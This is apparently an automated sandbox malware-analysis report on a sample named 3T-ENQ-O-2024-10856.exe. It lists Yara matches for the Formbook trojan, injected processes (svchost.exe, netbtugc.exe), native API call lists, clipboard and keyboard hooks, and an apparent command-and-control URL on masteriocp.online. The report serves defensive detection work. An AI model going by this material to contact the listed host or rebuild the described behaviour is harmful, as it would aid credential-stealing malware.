            Source: netbtugc.exe, 00000005.00000002.2597976548.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000005.00000002.2597976548.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000005.00000003.2047410010.0000000008132000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: netbtugc.exe, 00000005.00000002.2597976548.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_d
            Source: netbtugc.exe, 00000005.00000002.2597976548.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000005.00000002.2597976548.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033h
            Source: netbtugc.exe, 00000005.00000002.2597976548.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000005.00000002.2597976548.00000000030FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000005.00000002.2600631900.00000000045A8000.00000004.10000000.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000008.00000002.2600215728.00000000036B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.masteriocp.online/p5rq/?ndk=ctppWTth-&yXf=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqv
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CB7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00CB7099
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CB7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00CB7294
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe, Code function: 0_2_00CA4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00CA4342
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe, Code function: 0_2_00CCF5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00CCF5D0

            E-Banking Fraud

            Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.2601820210.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.2599340690.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.2597752897.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.1812298134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.2599631540.00000000031B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.1813082364.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2601820210.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2599340690.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2597752897.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1812298134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2599631540.00000000031B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1813082364.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0042C4F3 NtClose,2_2_0042C4F3
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72B60 NtClose,LdrInitializeThunk,2_2_03B72B60
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03B72DF0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03B72C70
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk,2_2_03B735C0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B74340 NtSetContextThread,2_2_03B74340
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B74650 NtSuspendThread,2_2_03B74650
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72BA0 NtEnumerateValueKey,2_2_03B72BA0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72B80 NtQueryInformationFile,2_2_03B72B80
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72BF0 NtAllocateVirtualMemory,2_2_03B72BF0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72BE0 NtQueryValueKey,2_2_03B72BE0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72AB0 NtWaitForSingleObject,2_2_03B72AB0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72AF0 NtWriteFile,2_2_03B72AF0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72AD0 NtReadFile,2_2_03B72AD0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72FB0 NtResumeThread,2_2_03B72FB0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72FA0 NtQuerySection,2_2_03B72FA0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72F90 NtProtectVirtualMemory,2_2_03B72F90
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72FE0 NtCreateFile,2_2_03B72FE0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72F30 NtCreateSection,2_2_03B72F30
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72F60 NtCreateProcessEx,2_2_03B72F60
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72EA0 NtAdjustPrivilegesToken,2_2_03B72EA0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72E80 NtReadVirtualMemory,2_2_03B72E80
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72EE0 NtQueueApcThread,2_2_03B72EE0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72E30 NtWriteVirtualMemory,2_2_03B72E30
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72DB0 NtEnumerateKey,2_2_03B72DB0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72DD0 NtDelayExecution,2_2_03B72DD0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72D30 NtUnmapViewOfSection,2_2_03B72D30
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72D10 NtMapViewOfSection,2_2_03B72D10
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72D00 NtSetInformationFile,2_2_03B72D00
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72CA0 NtQueryInformationToken,2_2_03B72CA0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72CF0 NtOpenProcess,2_2_03B72CF0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72CC0 NtQueryVirtualMemory,2_2_03B72CC0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72C00 NtQueryInformationProcess,2_2_03B72C00
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B72C60 NtCreateKey,2_2_03B72C60
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B73090 NtSetValueKey,2_2_03B73090
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B73010 NtOpenDirectoryObject,2_2_03B73010
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B739B0 NtGetContextThread,2_2_03B739B0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B73D10 NtOpenProcessToken,2_2_03B73D10
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03B73D70 NtOpenThread,2_2_03B73D70
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E4340 NtSetContextThread,LdrInitializeThunk,5_2_038E4340
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E4650 NtSuspendThread,LdrInitializeThunk,5_2_038E4650
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_038E2BA0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_038E2BE0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_038E2BF0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2B60 NtClose,LdrInitializeThunk,5_2_038E2B60
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2AD0 NtReadFile,LdrInitializeThunk,5_2_038E2AD0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2AF0 NtWriteFile,LdrInitializeThunk,5_2_038E2AF0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2FB0 NtResumeThread,LdrInitializeThunk,5_2_038E2FB0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2FE0 NtCreateFile,LdrInitializeThunk,5_2_038E2FE0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2F30 NtCreateSection,LdrInitializeThunk,5_2_038E2F30
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_038E2E80
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_038E2EE0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2DD0 NtDelayExecution,LdrInitializeThunk,5_2_038E2DD0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_038E2DF0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_038E2D10
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_038E2D30
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_038E2CA0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2C60 NtCreateKey,LdrInitializeThunk,5_2_038E2C60
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_038E2C70
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E35C0 NtCreateMutant,LdrInitializeThunk,5_2_038E35C0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E39B0 NtGetContextThread,LdrInitializeThunk,5_2_038E39B0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2B80 NtQueryInformationFile,5_2_038E2B80
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2AB0 NtWaitForSingleObject,5_2_038E2AB0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2F90 NtProtectVirtualMemory,5_2_038E2F90
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2FA0 NtQuerySection,5_2_038E2FA0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2F60 NtCreateProcessEx,5_2_038E2F60
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2EA0 NtAdjustPrivilegesToken,5_2_038E2EA0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2E30 NtWriteVirtualMemory,5_2_038E2E30
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2DB0 NtEnumerateKey,5_2_038E2DB0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2D00 NtSetInformationFile,5_2_038E2D00
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2CC0 NtQueryVirtualMemory,5_2_038E2CC0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2CF0 NtOpenProcess,5_2_038E2CF0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E2C00 NtQueryInformationProcess,5_2_038E2C00
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E3090 NtSetValueKey,5_2_038E3090
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E3010 NtOpenDirectoryObject,5_2_038E3010
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E3D10 NtOpenProcessToken,5_2_038E3D10
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_038E3D70 NtOpenThread,5_2_038E3D70
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_03028B30 NtCreateFile,5_2_03028B30
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_03028FB0 NtAllocateVirtualMemory,5_2_03028FB0
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_03028E40 NtClose,5_2_03028E40
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_03028D90 NtDeleteFile,5_2_03028D90
            Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 5_2_03028CA0 NtReadFile,5_2_03028CA0
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe, Code function: 0_2_00CA70AE: CreateFileW,DeviceIoControl,CloseHandle,0_2_00CA70AE
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe, Code function: 0_2_00C9B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C9B9F1
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe, Code function: 0_2_00CA82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00CA82D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038B70C05_2_038B70C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0395F0CC5_2_0395F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396F0E05_2_0396F0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039670E95_2_039670E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396F7B05_2_0396F7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039616CC5_2_039616CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038F56305_2_038F5630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0394D5B05_2_0394D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039795C35_2_039795C3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039675715_2_03967571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396F43F5_2_0396F43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038A14605_2_038A1460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038CFB805_2_038CFB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03925BF05_2_03925BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038EDBF95_2_038EDBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396FB765_2_0396FB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038F5AA05_2_038F5AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03951AA35_2_03951AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0394DAAC5_2_0394DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0395DAC65_2_0395DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03967A465_2_03967A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396FA495_2_0396FA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03923A6C5_2_03923A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038B99505_2_038B9950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038CB9505_2_038CB950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038B38E05_2_038B38E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0391D8005_2_0391D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038B1F925_2_038B1F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396FFB15_2_0396FFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03873FD55_2_03873FD5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03873FD25_2_03873FD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396FF095_2_0396FF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038B9EB05_2_038B9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038CFDC05_2_038CFDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038B3D405_2_038B3D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03961D5A5_2_03961D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03967D735_2_03967D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396FCF25_2_0396FCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03929C325_2_03929C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030118105_2_03011810
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0300C7605_2_0300C760
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0300AA005_2_0300AA00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0300C9805_2_0300C980
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03014EC05_2_03014EC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0301309B5_2_0301309B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030130A05_2_030130A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0302B4205_2_0302B420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0361E2E85_2_0361E2E8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0361E7A85_2_0361E7A8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0361E4035_2_0361E403
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0361D8085_2_0361D808
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B87E54 appears 111 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0392F290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 038F7E54 appears 111 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0389B970 appears 279 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0391EA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 038E5130 appears 50 times
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: String function: 00C7F885 appears 68 times
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: String function: 00C87750 appears 42 times
Source: 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1365761273.00000000042ED000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 3T-ENQ-O-2024-10856.exe
Source: 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1363886940.0000000004143000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 3T-ENQ-O-2024-10856.exe
Source: 3T-ENQ-O-2024-10856.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2601820210.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2599340690.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2597752897.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1812298134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
